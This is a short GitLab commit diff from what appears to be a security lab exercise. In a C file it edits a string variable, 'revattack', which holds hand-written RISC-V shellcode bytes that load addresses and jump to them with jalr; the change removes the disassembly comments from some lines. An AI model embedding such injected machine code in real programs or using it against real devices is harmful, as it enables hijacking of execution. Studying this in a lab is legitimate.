Skip to content
Snippets Groups Projects
Commit 97ee1ae7 authored by fptk's avatar fptk Committed by aticu
Browse files

Rest von Freitag

parent fce313ab
Branches
No related tags found
No related merge requests found
......@@ -120,10 +120,10 @@ int main(void) {
char *attack = "sBAUM";
char *revattack = "a"
"\x37\x05\x01\x20" // 0: lui a0,0x20010
"\x13\x05\xc5\x55" // 4: addi a0,a0,1372 # 0x2001055c
"\x13\x0e\x00\x00" // 8: li t3,0
"\x37\x1e\x01\x20" // c: lui t3,0x20011
"\x37\x05\x01\x20"
"\x13\x05\xc5\x55"
"\x13\x0e\x00\x00"
"\x37\x1e\x01\x20"
"\x13\x0e\xce\x45" // 10: addi t3,t3,1116 # 0x2001145c
"\xe7\x0e\x0e\x00" // 14: jalr t4,t3
"\x13\x00\x00\x00" // 18: nop
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Please register or to comment